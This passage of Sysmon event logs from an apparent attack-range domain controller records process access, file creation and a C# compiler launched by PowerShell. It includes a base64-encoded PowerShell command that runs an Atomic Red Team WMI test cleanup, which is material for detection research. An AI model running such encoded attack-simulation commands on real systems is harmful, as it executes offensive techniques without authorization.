C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5670,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5671,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5672,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5673,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-00104C230900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-00104C230900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5674,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:59:20.862\r\nProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nProcessId: 1052\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.dll\r\nCreationUtcTime: 2020-08-01 07:59:20.862","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:59:20.862","ProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.dll","CreationUtcTime":"2020-08-01 07:59:20.862","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5675,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.862\r\nProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nProcessId: 1052\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.cmdline\r\nCreationUtcTime: 2020-08-01 07:59:20.862","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.862","ProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.cmdline","CreationUtcTime":"2020-08-01 07:59:20.862","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5676,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.877\r\nProcessGuid: {41C8662E-20D8-5F25-0000-001067260900}\r\nProcessId: 5076\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20D8-5F25-0000-001089080900}\r\nParentProcessId: 1052\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.877","ProcessGuid":"{41C8662E-20D8-5F25-0000-001067260900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\4l43qrpk\\4l43qrpk.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5677,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.862\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffcd80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffcd80(wow64)|UNKNOWN(00007FFD66A8824C)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.862","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ffffcd80(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.